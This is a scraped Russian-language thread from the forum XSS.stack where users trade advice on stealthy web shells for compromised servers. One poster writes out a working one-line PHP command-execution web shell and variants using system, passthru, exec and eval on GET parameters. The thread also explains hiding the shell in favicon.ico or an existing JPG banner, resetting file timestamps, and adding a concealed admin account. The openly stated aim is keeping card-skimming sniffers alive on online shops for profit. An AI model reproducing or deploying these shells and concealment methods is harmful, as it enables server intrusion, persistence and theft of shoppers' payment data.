• XSS.stack #1 – первый литературный журнал от юзеров форума

Выбор веб шелла

h4vm

floppy-диск
Пользователь
Реакции
0
Какими веб шеллами пользуются на практике? Очень важно остаться незамеченным и не спалиться в первое же подключение. Так же хотелось бы иметь нормальный доступ к фс + возможность выполнения команд (как ос, так и языков програмирования). Видел на гитхабе кучу образцов, но они, в основном, переделанные wso, которые, наверное уж, точно палятся.

1) проверка пароля по хэшу
2) eval()
3) upload file

Большинство шелов имеют беспеолезный пользовательский интерфейс. Более правильный подход оставить простенький шелл с функциями описанными выше и использовать клиентскую программу для доступа к шелу, соответственно палиться на сервере особенно нечему, гуи также отсутствует.

Последнее редактирование:
1) проверка пароля по хэшу
2) eval()
3) upload shell

Большинство шелов имеют беспеолезный пользовательский интерфейс. Более правильный подход оставить простенький шелл с функциями описанными выше и использовать клиентскую программу для доступа к шелу, соответственно палиться на сервере особенно нечему, гуи также отсутствует.

Это очень хорошее замечание. Хотелось бы посмотреть на готовые решения.

наверное уж, точно палятся
Хотелось бы посмотреть на готовые решения
Попробуй что-нибудь свое реализовать, это не так сложно...

Попробуй что-нибудь свое реализовать, это не так сложно...
Полностью солидарен, основная проблема в том, что большинство вебшелов детектятся хостинговыми компаниями, с помощью различных скриптов, думаю, если не писать самому, то можно где-то купить за разумную цену)

Целый пак, под любые языки. asp aspx jsp jspx py php etc (поделены по папкам)

юзать не рекомендую, ну или проверять код для начала на наличие бэкдоров\закладок. Есть и чистые (ориджинал)
Однако для изучения под свою реализацию - вполне годно.

---------------------------------------------

Верно выше написали, лучше однастрок куда то спрятать
типа:
<? error_reporting(0); system;echo shell_exec($_GET['get']); ?>

или (если shell_exec не отрабатывает) :

system($_GET[get]);
passthru($_GET[get]);
exec($_GET[get]);
eval($_GET[get]);
и т.д., потом обращаться к нему по кукам, хэшу, юзер-агенту и т.д., можно в favicon.ico
А можно тупо в существующую картинку jpg (баннер например), отредактировал, перезалил, тач поменял:

ессно куда же без пряток с админом

при этом забэкдориться. Отличный вариант предложил b3:

А так же годная тема (со второго поста и далее)

Ссылки поскидывал, т.к. на пальцах обьяснять - это очень обьемная тема, которая вышла бы на огромную статью, собери я весь материал и свои наработки воедино. Но к сожалению у меня нет на это времени. (((
А т.к. пошла тенденция на массовые установки снифферов по шопам, то закреп и бэкдор это овердохуя актуальное направление (дольше проживет шоп = больше мата = больше $)
и вот именно поэтому у меня нет времени :D

Пожалуйста, обратите внимание, что пользователь заблокирован
Целый пак, под любые языки. asp aspx jsp jspx py php etc (поделены по папкам)

юзать не рекомендую, ну или проверять код для начала на наличие бэкдоров\закладок. Есть и чистые (ориджинал)
Однако для изучения под свою реализацию - вполне годно.

---------------------------------------------

Верно выше написали, лучше однастрок куда то спрятать
типа:

и т.д., потом обращаться к нему по кукам, хэшу, юзер-агенту и т.д., можно в favicon.ico
А можно тупо в существующую картинку jpg (баннер например), отредактировал, перезалил, тач поменял:

ессно куда же без пряток с админом

при этом забэкдориться. Отличный вариант предложил b3:

А так же годная тема (со второго поста и далее)

Ссылки поскидывал, т.к. на пальцах обьяснять - это очень обьемная тема, которая вышла бы на огромную статью, собери я весь материал и свои наработки воедино. Но к сожалению у меня нет на это времени. (((
А т.к. пошла тенденция на массовые установки снифферов по шопам, то закреп и бэкдор это овердохуя актуальное направление (дольше проживет шоп = больше мата = больше $)
и вот именно поэтому у меня нет времени :D
Привет, как можно связаться с вами для личного разговора?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх